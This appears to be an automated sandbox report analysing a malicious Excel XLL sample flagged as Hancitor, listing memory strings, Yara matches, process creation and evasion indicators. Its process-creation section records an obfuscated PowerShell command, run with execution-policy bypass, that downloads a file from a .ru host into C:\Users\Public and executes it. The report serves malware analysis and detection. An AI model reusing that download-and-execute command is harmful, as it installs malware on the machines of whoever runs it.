Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://graph.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://graph.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://lifecycle.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://login.windows.local
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://management.azure.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://management.azure.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://messaging.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://ncus.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://officeapps.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://onedrive.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://osi.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://outlook.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://outlook.office365.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 0708_5355150121.xll String found in binary or memory: https://sectigo.com/CPS0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://settings.outlook.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://staging.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://tasks.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://wus2.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Malicious sample detected (through community Yara rule)
Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\snd32sys.exe
Abnormal high CPU Usage
Source: C:\Users\Public\snd32sys.exe Process Stats: CPU usage > 98%
Detected potential crypto function
Source: C:\Windows\SysWOW64\mshta.exe Code function: 1_3_064950B7 1_3_064950B7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04B2E670 2_2_04B2E670
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00643154 16_2_00643154
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0063A1B7 16_2_0063A1B7
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0063C250 16_2_0063C250
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0064920D 16_2_0064920D
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00643386 16_2_00643386
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062D39F 16_2_0062D39F
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00629420 16_2_00629420
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_006435C7 16_2_006435C7
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0065F68B 16_2_0065F68B
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00639707 16_2_00639707
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062D711 16_2_0062D711
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0063C7C0 16_2_0063C7C0
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0065F7AB 16_2_0065F7AB
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0064382C 16_2_0064382C
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0065B830 16_2_0065B830
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062D9BB 16_2_0062D9BB
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00643AA0 16_2_00643AA0
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062CB20 16_2_0062CB20
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0063CBF0 16_2_0063CBF0
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00652C03 16_2_00652C03
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00642CE1 16_2_00642CE1
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062DC82 16_2_0062DC82
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00643D05 16_2_00643D05
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062DF3D 16_2_0062DF3D
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00642F13 16_2_00642F13
Found potential string decryption / allocating functions
Source: C:\Users\Public\snd32sys.exe Code function: String function: 0062B2C4 appears 61 times
Source: C:\Users\Public\snd32sys.exe Code function: String function: 0062BBA0 appears 50 times
Source: C:\Users\Public\snd32sys.exe Code function: String function: 0062B2F8 appears 46 times
PE / OLE file has an invalid certificate
Source: 0708_5355150121.xll Static PE information: invalid certificate
PE file contains strange resources
Source: snd32sys.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: snd32sys.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: 0708_5355150121.xll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Yara signature match
Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE Matched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine Classification label: mal100.troj.expl.evad.winXLL@10/11@4/4
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{0A2181D0-DD23-4259-8109-9971A9896497} - OProcSessId.dat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\snd32sys.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 0708_5355150121.xll Virustotal: Detection: 23%
Source: 0708_5355150121.xll ReversingLabs: Detection: 17%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\snd32sys.exe Unpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 16_2_00613560
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .img
PE file contains sections with non-standard names
Source: 0708_5355150121.xll Static PE information: section name: .img
Source: 0708_5355150121.xll Static PE information: section name: .ico
Source: 0708_5355150121.xll Static PE information: section name: .fyjrtr
Source: 0708_5355150121.xll Static PE information: section name: .rytkrer
Source: 0708_5355150121.xll Static PE information: section name: .reyery
Source: 0708_5355150121.xll Static PE information: section name: .txt
Source: 0708_5355150121.xll Static PE information: section name: .res
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04B212A1 push es; ret 2_2_04B212B0
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062B28D push ecx; ret 16_2_0062B2A0
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062034A push 8BFFFFFFh; ret 16_2_0062034F
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_006208AD push 8BFFFFFFh; ret 16_2_006208B2
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062BBE6 push ecx; ret 16_2_0062BBF9

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\snd32sys.exe
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\snd32sys.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\snd32sys.exe

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00629420 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 16_2_00629420
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (194 identical entries) Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (5 identical entries) Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1888 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3141 Jump to behavior
